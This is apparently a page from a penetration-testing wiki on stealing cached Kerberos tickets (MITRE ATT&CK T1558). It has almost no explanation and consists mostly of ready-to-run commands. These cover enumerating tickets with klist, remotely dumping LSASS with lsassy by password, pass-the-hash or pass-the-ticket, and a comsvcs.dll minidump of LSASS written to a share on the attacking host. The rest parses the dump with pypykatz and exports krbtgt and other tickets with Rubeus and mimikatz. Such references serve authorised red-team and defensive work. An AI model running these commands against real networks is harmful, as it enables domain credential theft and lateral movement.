Cached Kerberos tickets
MITRE ATT&CK™ Steal or Forge Kerberos Tickets - Technique T1558
Theory
Practice
Enumerate
#Enumerate TGT and TGS
klist tickets
#Enumerate sessions
klist sessions.\Rubeus.exe triageDump tickets
# With a password
lsassy -d <DOMAIN.LOCAL> -u <USER> -p <PASSWORD> <TARGET> -K '/tmp/kerberos_tickets'
# With PtH
lsassy -d <DOMAIN.LOCAL> -u <USER> -H <NTHash> <TARGET> -K '/tmp/kerberos_tickets'
# With PtT
lsassy -k <TARGET> -K '/tmp/kerberos_tickets'# Example of a dump where Z: is mounted on the attacking host
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid Z:\lsass.dmp full
# Get Tickets
pypykatz lsa minidump /path/to/lsass.dmp -k /tmp/kerberos_tickets# Dump all tickets
.\Rubeus dump
# Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
# Write ticket to disk
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /exportAsk a TGS
Resources
Last updated